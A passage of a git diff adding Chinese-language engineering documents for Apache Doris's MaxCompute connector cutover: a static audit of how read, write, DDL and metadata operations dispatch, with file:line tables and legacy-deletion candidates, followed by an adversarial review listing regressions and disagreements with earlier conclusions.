@`PluginDrivenExternalTable:205`)→ `translator:761` 转发 `SelectedPartitions` → `setSelectedPartitions:158` | `resolveRequiredPartitions:172` → `getSplits:409` → `planScan(...requiredPartitions):180` → `toPartitionSpecs:211/262`(喂 ODPS read session) | 否 — 同门;裁剪到零 `:410-412` 短路空 split(镜像 legacy) | +| 谓词下推(G0/G2) | ROUTE✅ | `PluginDrivenScanNode.convertPredicate:322` + `buildRemainingFilter:791` | `MaxComputeScanPlanProvider.convertFilter:273/295` → `MaxComputePredicateConverter.convert:87` | 否 — legacy 谓词转换在不可达的 legacy node 内 | +| limit-split(P3-9) | ROUTE✅ | `getSplits:398` `tryPushDownLimit:363` / `effectiveSourceLimit:425` | `MaxComputeScanPlanProvider.shouldUseLimitOptimization:441`(三闸)→ `planScanWithLimitOptimization:375` | 否 — 连接器局部;session var `enable_mc_limit_split_optimization` @`:426`(默认 OFF) | +| batch-mode(P3-11) | ROUTE✅ | `PluginDrivenScanNode.isBatchMode:455` / `numApproximateSplits:507` / `startSplit:525` | `shouldUseBatchMode:491` + `supportsBatchScan:250`(`getFileNum()>0`)→ `planScanForPartitionBatch:560`(SPI default `ConnectorScanPlanProvider:166-174` **委托 6 参 planScan**,已核非 no-op) | 否 — legacy batch 路在不可达 node 内;异步走 `ExtMetaCacheMgr.getScheduleExecutor` | +| CAST 剥壳(F9) | ROUTE✅ | `buildRemainingFilter:791` → `metadata.supportsCastPredicatePushdown:798` | `MaxComputeConnectorMetadata.supportsCastPredicatePushdown:332`=**false** → 剥壳保 BE-only `:799-810`(`pruneConjunctsFromNodeProperties:650` 复入) | 否 — mc 无 legacy 谓词处理执行 | + +--- + +## 2. 写路径(6/6 ROUTE✅)— 历史 3 blocker 重灾区,本审计确认 dispatch-clean + +A/B 分叉 = `UnboundTableSinkCreator` 单一 `instanceof curCatalog`(3 overload 一致):mc 为 `PluginDrivenExternalCatalog` → `UnboundConnectorTableSink`(`:68`);legacy `UnboundMaxComputeTableSink` 仅 `instanceof MaxComputeExternalCatalog`(`:66/105/146`)下建、不可达。 + +| Op | 判定 | FE 入口 (file:line) | SPI 实现 (file:line) | legacy 可达?(判据) | +|---|---|---|---|---| +| INSERT INTO(sink+executor) | ROUTE✅ | `UnboundTableSinkCreator:68`;executor `InsertIntoTableCommand:593/616` | `BindSink.bindConnectorTableSink:911` → `LogicalConnectorTableSink:927` → impl 规则 `…ToPhysicalConnectorTableSink:36` → `PhysicalPlanTranslator.visitPhysicalConnectorTableSink:645` → `PluginDrivenTableSink:679`;`PluginDrivenInsertExecutor:616` | 否 — `PhysicalMaxComputeTableSink`/`MaxComputeTableSink`/`MCInsertExecutor` 守在 `instanceof PhysicalMaxComputeTableSink`(`translator:593`、`InsertIntoTableCommand:562/588`),该物理 sink 从不产出;legacy impl 规则(`RuleSet:233/281`)仅匹配 `LogicalMaxComputeTableSink`、从不创建 | +| **INSERT OVERWRITE**(网关+下层,NG-1) | ROUTE✅ | 网关 `InsertOverwriteTableCommand.allowInsertOverwrite:318`;下层 `:218` + 重插 `insertIntoPartitions:438` | 网关 → `PluginDrivenExternalTable` 分支 `:325` → `pluginConnectorSupportsInsertOverwrite:337` → `MaxComputeConnectorMetadata.supportsInsertOverwrite:310`=**true**;重插 `PluginDrivenInsertCommandContext.setOverwrite(true):447` → `PluginDrivenTableSink:234` → `MaxComputeWritePlanProvider:92 isOverwrite` → `builder.overwrite(true):168` | 否 — `:324` MaxComputeExternalTable 分支 + `:417` legacy overwrite 均需 legacy 类、不可达。**网关不挡死**(连接器返 true) | +| 事务 begin/commit/block-id(GC1) | ROUTE✅ | `BaseExternalTableInsertExecutor:68`(`transactionManager = catalog.getTransactionManager()`);block-id RPC `FrontendServiceImpl.getMaxComputeBlockIdRange:3680` | `PluginDrivenTransactionManager`(`PluginDrivenExternalCatalog:118`);`PluginDrivenInsertExecutor.beginTransaction:82-88`(`usesConnectorTransaction`=true @`MaxComputeConnectorMetadata:344`)→ `:361` 建 `MaxComputeConnectorTransaction:363`;全局 `PluginDrivenTransactionManager.begin:80 putTxnById`;`:3694 getTxnById` → `allocateWriteBlockRange:133` | 否 — legacy `MCTransaction` 从不注册进全局 registry | +| sink 必需物理属性(local-sort/并行,P0-2) | ROUTE✅ | impl 规则 `…ToPhysicalConnectorTableSink:36`;`RequestPropertyDeriver` 消费 | `PhysicalConnectorTableSink.getRequirePhysicalProperties:142`(动态分区 hash-distribute + `MustLocalSortOrderSpec:178-188`,由连接器分区能力门控) | 否 — `PhysicalMaxComputeTableSink.getRequirePhysicalProperties` 该物理 sink 从不产出 | +| bind 投影(P0-3) | ROUTE✅ | `BindSink:173` | `bindConnectorTableSink:911`;full-schema 重排 `requiresFullSchemaWriteOrder:941`;`selectConnectorSinkBindColumns:971` | 否 — `bindMaxComputeTableSink:864` 仅 `UnboundMaxComputeTableSink`(`:171`)触发、从不创建 | +| post-commit refresh(P3-12) | ROUTE✅ | `InsertIntoTableCommand:616` | `PluginDrivenInsertExecutor.doAfterCommit:190`(swallow-and-warn,DV-018) | 否 — `MCInsertExecutor.doAfterCommit` 不可达 | + +--- + +## 3. DDL 路径(6/6 ROUTE✅) + +`PluginDrivenExternalCatalog` override 四 DDL(`createTable:267` / `createDb:336` / `dropDb:377` / `dropTable:406`),均 `connector.getMetadata(session).*`;`metadataOps` **恒 null** 但只路由到死的「not supported」base 分支(四 op 全 override),replay `afterX` helper 有显式 plugin-path else(`ExternalCatalog:1023-27/1049-52/1085-88/1143-46`)。 + +| Op | 判定 | FE 入口 (file:line) | SPI 实现 (file:line) | legacy 可达?(判据) | +|---|---|---|---|---| +| CREATE TABLE | ROUTE✅ | `CreateTableCommand:91` → `Env:3752 catalogIf.createTable` | `PluginDrivenExternalCatalog:267` → `MaxComputeConnectorMetadata:389` | 否 — `CreateTableInfo:391/920 instanceof MaxComputeExternalCatalog`=FALSE(`:393/:922` PluginDriven);`MaxComputeMetadataOps` 仅绑于从不实例化的 legacy catalog `:232` | +| CTAS | ROUTE✅ | `CreateTableCommand:103`(create)+ `:110`(insert) | create 同上;insert `UnboundTableSinkCreator:69 UnboundConnectorTableSink` | 否 — `UnboundTableSinkCreator:66` 死;IF-NOT-EXISTS 短路 `PluginDriven:290-294` 返 true → `:104` 跳 insert | +| DROP TABLE | ROUTE✅ | `DropTableCommand:89` → `Env:5035 catalogIf.dropTable`(**无 instanceof**) | `PluginDrivenExternalCatalog:406` → `MaxComputeConnectorMetadata:449` | 否 — 多态分发命中 override;legacy 需 null metadataOps | +| CREATE DATABASE | ROUTE✅ | `CreateDatabaseCommand:69` → `Env:3645 catalogIf.createDb`(无 instanceof) | `PluginDrivenExternalCatalog:336` → `MaxComputeConnectorMetadata:471`;IF-NOT-EXISTS 远端 `databaseExists:350`(`supportsCreateDatabase:466`) | 否 | +| DROP DATABASE FORCE | ROUTE✅ | `DropDatabaseCommand:76` → `Env:3671 catalogIf.dropDb`(无 instanceof) | `PluginDrivenExternalCatalog:377` → `MaxComputeConnectorMetadata:478`;`force` 透传;级联删表 `:480-493`(ODPS 不自级联,镜像 legacy) | 否 | +| CREATE CATALOG 校验(G6) | ROUTE✅ | `CatalogMgr:277/559` → `CatalogFactory:106/169` + `PluginDrivenExternalCatalog:158` → `ConnectorFactory:97` | `MaxComputeConnectorProvider.validateProperties:59` + `preCreateValidation`(PluginDriven `:174`) | 否 — legacy `MaxComputeExternalCatalog.checkProperties:388` 不可达(类从不实例化) | + +--- + +## 4. 元数据路径(6/6 ROUTE✅) + +每处 legacy 分支为 `instanceof MaxComputeExternalCatalog/Table` 守卫、运行时 FALSE,紧邻 PluginDriven 分支接住。 + +| Op | 判定 | FE 入口 (file:line) | SPI 实现 (file:line) | legacy 可达?(判据) | +|---|---|---|---|---| +| list databases | ROUTE✅ | `PluginDrivenExternalCatalog.listDatabaseNames:216` | `MaxComputeConnectorMetadata.listDatabaseNames:95` | 否 — legacy catalog 不实例化 | +| list tables | ROUTE✅ | `listTableNamesFromRemote:222` | `listTableNames:105` | 否 — 同 | +| get schema | ROUTE✅ | `PluginDrivenExternalTable.initSchema:118` | `MaxComputeConnectorMetadata.getTableSchema:130` → `PluginDrivenSchemaCacheValue:175` | 否 — `MaxComputeExternalMetaCache` 仅经 `MaxComputeExternalTable:122` 触达(从不建);`ExternalMetaCacheRouteResolver:75 instanceof`=FALSE → `ENGINE_DEFAULT:89` | +| DESCRIBE / isKey(P3-10) | ROUTE✅ | `initSchema` → `ConnectorColumnConverter.convertColumns:67` | `MaxComputeConnectorMetadata.buildColumn:178-181`(`isKey=true`) | 否 — 同 get schema | +| **SHOW PARTITIONS** | ROUTE✅ | `ShowPartitionsCommand.handleShowPartitions:458`(`instanceof MaxComputeExternalCatalog`=FALSE)→ `:460` | `handleShowPluginDrivenTablePartitions:312` → `MaxComputeConnectorMetadata.listPartitionNames:237` | 否 — `handleShowMaxComputeTablePartitions:292` / `MaxComputeExternalCatalog.listPartitionNames:258` 不可达 | +| **partitions() TVF** | ROUTE✅ | `MetadataGenerator.partitionsMetadataResult:1315`(FALSE)→ `:1317`;TVF analyze `PartitionsTableValuedFunction:204`(FALSE)→ `:210` | `dealPluginDrivenCatalog:1359` → `listPartitionNames:237` | 否 — `dealMaxComputeCatalog:1344` 不可达 | + +--- + +## 5. legacy 删除候选 disposition(Batch-D 静态前置门 = 全 PASS) + +下列类/方法在**全部 4 域审计的并集**上对 `max_compute` **运行时零可达**(live dispatch + replay 双闭)。HANDOFF 列 8 个 + 审计新增(标 🆕): + +| legacy 工件 | 运行时状态 | 死因(判据) | +|---|---|---| +| `MaxComputeExternalCatalog` | 死 | 从不 `new`;`GsonUtils:411` compat → PluginDriven | +| `MaxComputeExternalDatabase` 🆕 | 死 | `buildDbForInit` 强制 PLUGIN;`GsonUtils:463` compat | +| `MaxComputeExternalTable` | 死 | `buildTableInternal:43` 从不触达;`GsonUtils:484` compat。残引 `translator:598/799`、`BindSink:866`、`source/MaxComputeScanNode`、`MCInsertExecutor` 均 instanceof-死分支 | +| `MaxComputeMetadataOps` | 死 | 仅绑于 `MaxComputeExternalCatalog:232`(从不实例化) | +| `MaxComputeExternalMetaCache` 🆕 / `MaxComputeSchemaCacheValue` 🆕 | 死 | 仅经 legacy MetaCache/Table 触达 | +| `source/MaxComputeScanNode` / `MaxComputeSplit` 🆕 | 死 | `translator:800` else-if 死分支 | +| `MCTransaction` | 死 | 从不注册进全局 txn registry | +| `PhysicalMaxComputeTableSink` / `MaxComputeTableSink`(planner) | 死 | 该物理 sink 从不产出 | +| `bindMaxComputeTableSink`(BindSink 方法) | 死 | 仅 `UnboundMaxComputeTableSink:171` 触发 | +| `UnboundMaxComputeTableSink` 🆕 / `LogicalMaxComputeTableSink`+impl 规则(`RuleSet:233/281`) 🆕 | 死 | 仅 `instanceof MaxComputeExternalCatalog` 下建 / 仅匹配 LogicalMaxComputeTableSink | +| `MCInsertExecutor` 🆕 | 死 | executor 从不为 mc 实例化 | +| `allowInsertOverwrite` MC 分支(`:324`) | 死 | instanceof MaxComputeExternalTable 不可达 | + +⚠️ **Batch-D 删除须知**:上列均**运行时死、但编译期仍被 instanceof 守卫 / RuleSet 注册 / 残 import 引用**。删 legacy 类须**连同其已死分支/注册原子删除**否则不编译(横切复核 `MetadataGenerator`/`PartitionsTableValuedFunction`/`translator`/`BindSink`/`InsertOverwriteTableCommand`/`UnboundTableSinkCreator`/`RuleSet` 的 reverse-ref)。**唯独 `GsonUtils:411/463/484` 三 compat 行用字符串字面量、不 import legacy 类 → 删类后仍有效、应保留**(老镜像反序列化兼容)。 + +--- + +## 6. 范围外 / 开放项(非本审计否决项;均为行为面、非路由面) + +本审计 = **静态 FE 分发面**。下列不在范围、不影响「零 legacy 回退」结论,但为 🅱 删 legacy 真正完成所需: +- **🅰 live e2e(真实 ODPS)= 运行时真值面门**,仍是翻闸真正完成门(CI 跳)。所有 DV 真值闸(DV-013..022 等)须 live 验。 +- **BE 侧执行**:JNI scanner 消费 `MaxComputeScanRange` / sink BE 端写 / `onComplete` 真实 ODPS commit / overwrite BE 是否真 honor `builder.overwrite(true)` — 跨 FE→BE,本审计仅 trace FE dispatch。 +- **converter 全类型 parity**:`ExprToConnectorExpressionConverter` 是否逐 Expr kind 忠实翻译,未逐一 diff legacy(路由已定,行为待 converter 级 parity 测)。 +- 这些与本审计**正交**:即便其中有行为差异,也不构成「回退到 legacy 代码」(legacy 代码不执行)。 + +--- + +## 7. 方法与可信度 + +- **4 路 clean-room 并行 subagent**(general-purpose),各仅得架构事实 + op 清单,**不得**历史「已修/已坏」结论 → 独立判断、避免开发先验带偏([[clean-room-adversarial-review-pref]])。 +- **四路独立收敛于同一 linchpin**(catalog/db/table 恒 PluginDriven,legacy 守卫结构性 FALSE)= 强交叉验证。 +- **主线对抗交叉核查**:① 独立核 `CatalogFactory` + `PluginDrivenExternalCatalog` 全文(foundational);② GSON 三注册(replay 闭环);③ batch SPI default 委托(非 no-op);④ 对照 2026-06-07 domain-6 裁决一致。 +- **可信度:高**。单一决定性事实可证;逐 op file:line 均经直读。 +- **不信任何「已修」标签**(Rule 8/12):当年两度证伪的是行为 parity(已修),本轮独立证 dispatch 可达性本身 clean。 + +**裁决:静态分发面完整性门 = PASS。零 legacy 运行时回退。Batch-D 删 legacy 静态轴解锁,gated on 🅰 live e2e。** diff --git a/plan-doc/reviews/P4-cutover-review-findings.md b/plan-doc/reviews/P4-cutover-review-findings.md new file mode 100644 index 00000000000000..408e87eb5345ab --- /dev/null +++ b/plan-doc/reviews/P4-cutover-review-findings.md @@ -0,0 +1,272 @@ +# P4 — MaxCompute 翻闸实现 · 对抗 Review 结果(clean-room) + +> 生成方式: 多 agent 对抗 workflow(Phase A 独立审阅 → Phase B 3票对抗验证 → Phase C 历史交叉核对 → Phase D 综合)。 +> 纪律: Phase A/B reviewer 只读代码(不读 decisions-log/deviations-log/HANDOFF/designs); Phase C 才解除 clean-room。 +> 日期: 2026-06-07。brief: `plan-doc/tasks/P4-cutover-adversarial-review.md`。 + +## 概览 + +- 原始发现: 45 · 经对抗验证存活: 41 (blocker 5 / major 17 / minor 12 / question 7) +- 存活且标记为回归(regression=yes): 25 +- 历史结论分歧(disputed_claims): 16 +- 图例: adversarial-verdict 列 `✅存活 (n✓/m✗ of k)` 表示 k 个对抗验证者中 n 确认 / m 证伪, ≥2 确认才存活。 + +## 综合总结 + +# MaxCompute 翻闸对抗 Review 综合总结 + +本轮以"先读代码、后核历史"的对抗方式复审了 MaxCompute 从 legacy 到 PluginDriven SPI 的翻闸(cutover)。结论与既有 HANDOFF/设计文档的乐观判定有实质出入:**翻闸后的读路径在 BE 端类型混淆下整体不可用,且写/DDL/分区在若干用户可见维度存在回归。"gate-green / flip only changes dispatch / 读路径已通"这三条历史核心论断在代码层面均不成立。** + +## 一、Top 问题(按 severity) + +### Blocker(翻闸后即坏,必须修) + +1. **读取描述符类型混淆(READ-P1 / READ-C1)** — PluginDriven MaxCompute 的 `toThrift` 走 null 兜底产出 `SCHEMA_TABLE` 描述符且不含 `TMCTable`,但 BE `file_scanner.cpp` 在 `table_format_type=="max_compute"` 时无条件 `static_cast` 到 `MaxComputeTableDescriptor*`,造成非法向下转型,endpoint/quota/project/凭证全为越界/垃圾内存、无鉴权。**重要性**:读路径整体不可用,SELECT 必崩或返回错误数据。**回归:是**。根因是 `MaxComputeConnectorMetadata` 缺 `buildTableDescriptor` override。 + +2. **byte_size split size 误填(READ-P2)** — 默认 split 策略下 `rangeDesc.size=splitByteSize`(应为 `-1` sentinel),BE 据 `size==-1` 区分 BYTE_SIZE/ROW_OFFSET,误把 byte-size split 当 row-offset split → 损坏读取。**重要性**:即便绕过 blocker 1,默认路径仍读出错误数据。**回归:是**。 + +3. **无 ENGINE 子句的 CREATE TABLE 分析期报错(DDL-P1)** — `paddingEngineName` 只认 `MaxComputeExternalCatalog`,翻闸后 catalog 是 `PluginDrivenExternalCatalog` → 落 else 分支抛 `Current catalog does not support create table`,根本到不了 override。**重要性**:legacy 可用、翻闸即坏的 CREATE TABLE 子场景,且是 T06c 矩阵漏标(矩阵把 CREATE TABLE 一律标 PASS)。**回归:是**。 + +### Major(语义/可观察行为偏离,多数应修) + +4. **分区裁剪整体丢失(READ-P3 / READ-C2 / CACHE-C-SELECT)** — `PluginDrivenExternalTable` 不暴露任何分区 API(`supportInternalPartitionPruned`/`getPartitionColumns`/`getNameToPartitionItems` 全默认),connector 又恒传 `requiredPartitions=emptyList` → 大分区表退化整表扫,仅靠易整体回退的 ODPS filter 兜底。**回归:是**。 + +5. **partitions() TVF 与 SHOW PARTITIONS 仍被 FE 门禁挡死(DDL-C1 / CACHE-C1 / CACHE-C2)** — T06c 只接了 BE 取数支路(`MetadataGenerator`),`PartitionsTableValuedFunction.analyze` 的 catalog/table 类型 allow-list 与 `ShowPartitionsCommand` 的 `isPartitionedTable()` 门未接 → 这两条命令在 analyze 期即抛错,已接好的 BE handler 是不可达死代码。**回归:是**。 + +6. **DDL 远端名解析丢失(DDL-P3 / DDL-C2)** — CREATE/DROP TABLE 用本地名直发 ODPS SDK,丢了 legacy 的 `getRemoteName()` 映射;在 `lower_case_meta_names` / `meta_names_mapping` 生效时建错库、删错/找不到表。**回归:是(数据正确性)**。 + +7. **DROP DATABASE FORCE 级联静默丢弃(DDL-P2 / DDL-C3)** — force 不转发,直发 `schemas().delete`;ODPS 常拒删非空 schema → legacy FORCE 成功而翻闸失败/留残表。**回归:是(待真实 ODPS 确认非空库删除行为后定级)**。 + +8. **INSERT 影响行数恒为 0(WRITE-P1 / WRITE-C1)** — `doBeforeCommit` 在 txn 模型分支被跳过,丢了 legacy 的 `loadedRows = transaction.getUpdateCnt()` 一行;数据写对,但客户端/SHOW INSERT RESULT/audit 报 `affected rows: 0`。**重要性**:可观察输出回归,且 `getUpdateCnt` 链路已实现、只差一行赋值。**回归:是**。 + +9. **datetime 谓词下推损坏 + 源时区错(READ-P4 / READ-C3)** — `LocalDateTime.toString()` 产 ISO-8601,被 `yyyy-MM-dd HH:mm:ss.SSS` formatter 解析失败 → 谓词被静默吞成 NO_PREDICATE;且源时区取 endpoint region 而非会话时区。**回归:是**。 + +10. **limit-split 优化无条件触发(READ-P5 / READ-C4)** — 忽略 `enable_mc_limit_split_optimization`(默认 OFF),且分区等值场景永不触发;默认行为与 legacy 相反。**回归:是**。 + +11. **DDL 列约束/本地校验丢失(DDL-P4 / DDL-C6)** — `ConnectorColumn` 不携带 auto-increment / 聚合标志,legacy 的拒绝校验被静默绕过;本地 db 存在校验亦缺失。**回归:是(静默丢语义)**。 + +12. **CAST 谓词下推语义不同(READ-C6)** — 翻闸默认剥离 CAST 把内层比较下推 ODPS,legacy 遇 CAST 保守不下推;有产生错误结果的风险。**回归:unsure**(需端到端核实)。 + +### Minor(窄口径差异,可接受但应登记) + +- **block 上限硬编码 20000(WRITE-P2 / WRITE-C2)** — 忽略可配置 `Config.max_compute_write_max_block_count`,仅运维调大时差异。**回归:是**。 +- **isKey 标记不同(READ-C7)** — data 列 legacy `isKey=true`,翻闸 `false` → DESCRIBE/information_schema 列属性差异。**回归:是**。 +- **CREATE TABLE IF NOT EXISTS 命中已存在表仍写 editlog + 刷缓存(DDL-C5)** — SPI 返回 void 无法区分新建/已存在,legacy 为 no-op。**回归:是**(冗余 editlog,不阻塞)。 +- **master 侧 editlog 与 cache 失效顺序反转(REPLAY-P1 / REPLAY-C1)** — 同 FE 本地同步,无可观察后果。**回归:否**。 +- **FE 侧 partition_values 二级缓存成死代码(CACHE-P1)** — 改为每查询直连 ODPS 列举分区,从一致性看更安全但多一次 round-trip。**回归:unsure(性能)**。 +- **split 缺 FILE_NET / fileSize / modificationTime(READ-C8)**;**post-commit 缓存刷新异常翻闸吞错而 legacy 抛错(WRITE-P3 / WRITE-C3)** — 后者实为改进(legacy 报失败会诱导重复写),但属可观察行为变更,应登记。 + +### 经核实属"翻闸更正确"的项(应作为回归基线,勿误判为差异) + +- **IN/NOT IN 取反 bug(READ-C9)** — legacy 把 NOT IN 下推为 ODPS IN(漏数据),翻闸修正了取反。**回归:否(有意修正)**,回归用例须以正确语义为基线。 + +## 二、与历史结论最关键的分歧 + +本轮基于代码**明确不认同**以下"历史认为没问题/已解决"的判定: + +1. **"翻闸后 read/write/DDL/partition/show 全经 SPI 正常工作""flip only changes dispatch"** — `route through the SPI` 仅在 dispatch 层成立,语义层不成立。读路径有 2 个 BE 端 blocker(描述符类型混淆、split size 误填)+ 分区裁剪丢失 + 多处下推语义偏离。**gate(compile/checkstyle/单测)从不覆盖 BE thrift 描述符类型、split 语义、与 legacy 的下推 parity,故 "gate-green" 不构成读 parity 证据**——该风险被错误标为"已缓解"。 + +2. **HANDOFF live 矩阵 "SELECT(含分区裁剪)✅ PASS / 读路径已通"** — 该 PASS 缺 BE 端与分区裁剪的核实。trino 路径验证的只是 split→BE 的通用 plumbing,不代表 MC 读语义正确;MC 在描述符类型混淆下拿不到凭证。 + +3. **"T06c 已把 partitions() TVF 的 FE 分发接到 SPI"(commit 2cf7dfa81ad ③,HANDOFF/设计标 ✅)** — **证伪**。`git show --stat` 显示该 commit 只改 `MetadataGenerator.java`,从未触碰 `PartitionsTableValuedFunction.java`;全文 grep 无 `PluginDrivenExternalCatalog` 分支。`dealPluginDrivenCatalog` 是不可达死代码,该 TVF 对翻闸后 MC 仍 100% FAIL。 + +4. **Batch D 设计的危险 amendment** — 其声称"T06c 已在 `PartitionsTableValuedFunction` 加 PluginDriven 分支,Batch D 应删 :173 的 MaxCompute 分支"。前提是错的:文件里根本没有该分支。**若按它执行删除,会删掉该 TVF analyze 唯一的非-Plugin 放行分支,使 partitions() 对 MC 永久不可用——正是 amendment 自称要防止的场景被它自己触发。** + +5. **"SHOW PARTITIONS 翻闸后可用(T06c 已接线,live 全绿)"** — 部分证伪。T06c 修了 allow-list/表类型/dispatch/handler,但漏了 `analyze()` 的 `isPartitionedTable()` 门;`PluginDrivenExternalTable` 未 override 该方法(default false)→ 真实分区表先抛"is not a partitioned table",新 handler 对分区表成死代码。设计 §4.3 把 `isPartitionedTable` 标"验证项"却未实现,却标全绿。 + +6. **"无 ENGINE 的 CREATE TABLE PASS"** — 矩阵不完整。`paddingEngineName` 在分析期即抛错,是 T06c 范围外、HANDOFF 与设计均未识别的 blocker 级回归。 + +7. **"doBeforeCommit 在 MC 路径被跳过是正确的,镜像 legacy MCInsertExecutor"** — 不认同。跳过会丢 legacy 的 `loadedRows = getUpdateCnt()`(load-bearing 一行);设计的 G1–G5 gap 与风险表只覆盖"能否写成功",完全没覆盖"写成功后报告的行数",loadedRows 是被设计遗漏的独立 gap。 + +8. **"DDL 远端名经连接器内部解析 remote 映射"(T06c 设计假定)** — 与代码相反。`MaxComputeConnectorMetadata` 的 `getTableHandle`/`createTable`/`dropTable` 都把本地名原样喂给 SDK,零 local→remote 解析。 + +9. **"DROP DATABASE FORCE 级联不复刻可接受(记 OQ)"** — 不认同其"可接受"定级;这是用户可见的 DDL 语义回归(major),不应在设计 §5 一笔带过。 + +10. **"A1 缓存失效全对齐 legacy 行为"** — 对齐了"是否失效"与 master/follower parity,但 master 侧 editlog 与 cache 失效的执行顺序被反转(legacy 先失效后写日志,翻闸相反)。判定无可观察回归,但"完全对齐"措辞不严谨,存在未记录的副作用顺序反转(Rule 12 fail loud)。 + +## 三、建议的后续动作(供决策) + +### A. live 验证 / Batch D 删除前**必须修复**(blocker + 阻断核心 DDL) + +- **READ-P1/C1**:为 `MaxComputeConnectorMetadata` 补 `buildTableDescriptor` override,产出 `MAX_COMPUTE_TABLE` + `TMCTable`(endpoint/quota/project/table/properties 含 time_zone),对齐 legacy `toThrift`。这是读路径能否工作的总开关。 +- **READ-P2**:byte_size split 回填 `rangeDesc.size=-1` sentinel,恢复 BE 的 BYTE_SIZE/ROW_OFFSET 判别。 +- **DDL-P1**:`paddingEngineName` / `checkEngineWithCatalog` 识别 `PluginDrivenExternalCatalog`(按 `getType()=="max_compute"` 或 connector 声明的 engine)。 +- **DDL-C1 / CACHE-C1 / CACHE-C2**:补 `PartitionsTableValuedFunction.analyze` 的 catalog/table allow-list、`ShowPartitionsCommand` 的 `isPartitionedTable()` 门,并让 `PluginDrivenExternalTable` override `isPartitionedTable`/`getPartitionColumns`/`getNameToPartitionItems`,打通已接好的 BE handler。 +- **⚠️ Batch D 红线**:**不要**按 Batch D 设计删除 `PartitionsTableValuedFunction:173` 的 MaxCompute 分支——该 amendment 前提错误,执行会使 partitions() 对 MC 永久不可用。删除前先在代码确认 PluginDriven 分支确已存在。 +- **DDL-P3/C2**:CREATE/DROP TABLE override 内先解析 `getRemoteName()`/`getRemoteDbName()` 再发连接器(否则名映射场景删错/建错对象,数据正确性回归)。 + +上述每项修完都应配**端到端 live SQL**:无 ENGINE 的 CREATE TABLE、分区表 SELECT、SHOW PARTITIONS、partitions() TVF、INSERT(看 affected rows)、DROP DATABASE FORCE 非空库。 + +### B. **强烈建议在本批次内修复**(major,影响正确性/可观察输出) + +- **READ-P3/C2**:打通分区裁剪(暴露分区 API + planScan 透传 prunedSpecs),否则大分区表整表扫。 +- **WRITE-P1/C1**:`doBeforeCommit` txn 分支回填 `loadedRows = getUpdateCnt()`(一行,链路已存在)。 +- **READ-P4/C3**:datetime 字面量按 `yyyy-MM-dd HH:mm:ss.SSS` 格式化、源时区改用会话时区。 +- **DROP DATABASE FORCE(DDL-P2/C3)**:**先用真实 ODPS 验证 `schemas().delete` 对非空库的行为**;若拒删则必须补回级联(逐表 drop)或在 force=true+非空库时报明确错。 + +### C. **可接受 / 待定**(须显式登记 deviation,Rule 12) + +- **READ-P5/P6/C4**(limit-opt 无条件触发)、**READ-C6**(CAST 下推)、**READ-C7**(isKey)、**READ-C8**(split locationType)、**WRITE-P2/C2**(block 上限)、**WRITE-P3/C3**(post-commit 吞错,实为改进)、**DDL-C5**(IF NOT EXISTS 冗余 editlog)、**CACHE-P1**(partition_values 死代码 + 每查询多一次 round-trip):若产品决定接受,**逐条写入 deviations-log 并在 release note 声明能力收敛**,不得静默。 +- **REPLAY-P1 / editlog-cache 顺序反转**:无可观察回归,接受,但在设计文档显式声明顺序差异。 +- **READ-C9(IN/NOT IN)**:确认为有意修正 legacy bug,回归用例以正确语义为基线。 + +**一句话决策建议**:当前翻闸**不具备 live 验收条件**——至少 A 类 6 项(2 个读 blocker + CREATE TABLE + partitions/SHOW PARTITIONS 门 + 远端名解析)必须先修;Batch D 的删除动作在 partitions() TVF 真正接线前**应冻结**,以免触发自伤。 + +## 🔴 与历史结论的分歧(最高优先级) + +| 路径 | 历史声称 | 本轮立场 | 证据 | 历史出处 | +|---|---|---|---|---| +| read | 翻闸(Batch C)后 read / write / DDL / partition / show all route through the SPI(即读路径经 SPI 正常工作) | 读路径翻闸后整体不可用且语义偏离。①(blocker)PluginDrivenExternalTable.toThrift 走 null 兜底产 TTableType.SCHEMA_TABLE 无 TMCTable,而 BE file_scanner.cpp:1067-1073 在 table_format_type=='max_compute' 时无条件 static_cast 到 MaxComputeTableDescriptor* → 类型混淆,endpoint/quota/project/凭证全为越界/垃圾内存,无鉴权。②(blocker)默认 byte_size split 策略下 rangeDesc.size=splitByteSize(应为 -1),BE max_compute_jni_reader.cpp:70 → MaxComputeJniScanner:125 把它误判为 ROW_OFFSET → 损坏读。③分区裁剪整体丢失。'route through the SPI'仅在 dispatch 层成立,语义层不成立。 | fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java:252-258; fe/fe-connector/.../MaxComputeConnectorMetadata.java(无 buildTableDescriptor override); fe/fe-connector/.../api/ConnectorTableOps.java:146-151; be/src/exec/scan/file_scanner.cpp:1067-1073; fe/fe-connector/.../MaxComputeScanRange.java:122; be/src/format/table/max_compute_jni_reader.cpp:69-70; fe/be-java-extensions/max-compute-connector/.../MaxComputeJniScanner.java:125-128 | plan-doc/tasks/designs/P4-T05-T06-cutover-design.md:11 | +| read | Flip breaks read/DDL/partition parity → 缓解措施:'Batch A+B already at parity (gate-green); flip only changes dispatch'(风险表把读 parity 当已缓解) | 不认同。'flip only changes dispatch' 隐含 dispatch 之外读路径与 legacy 等价,但实测翻闸侧读路径有至少 2 个 blocker(SCHEMA_TABLE 描述符类型混淆、byte_size split size 误填)+ 1 个 major(分区裁剪丢失,分区表退化整表扫)+ 数个谓词下推/limit-opt 语义偏离(datetime 谓词静默丢、源时区错、CAST 剥离下推、limit-opt 无条件触发)。gate(compile/checkstyle/单测)从不覆盖 BE 端 thrift 描述符类型、split 语义、与 legacy 的下推 parity,故'gate-green'不构成读 parity 证据。该风险被错误标为'已缓解'。 | fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java:252-258(SCHEMA_TABLE); fe/fe-connector/.../MaxComputeScanPlanProvider.java:201,316(requiredPartitions emptyList),186-196,352-359(limit-opt/stub); fe/fe-connector/.../MaxComputePredicateConverter.java:84-89,254-263(datetime 谓词吞异常); be/src/exec/scan/file_scanner.cpp:1067-1073 | plan-doc/tasks/designs/P4-T05-T06-cutover-design.md:165 | +| read | live 验证矩阵:'SELECT(含分区裁剪) \| ✅ PASS \| PluginDrivenScanNode → connector planScan \| 读路径已通' | 不认同。SELECT 在翻闸后(默认 byte_size split + max_compute 描述符路径)会因 BE 端 MaxComputeTableDescriptor 类型混淆而拿不到正确 endpoint/凭证 → 鉴权/读取失败;即便绕过,byte_size split size 误填会损坏读取;且'含分区裁剪'部分完全失效(PluginDrivenExternalTable 不报分区列 + connector 恒传 requiredPartitions=emptyList → 分区表整表扫)。'读路径已通'仅指 split→BE 的 plumbing 走通(P2 trino 已验),不代表 MC 读语义正确。此条 PASS 判定缺 BE 端与分区裁剪的核实。 | 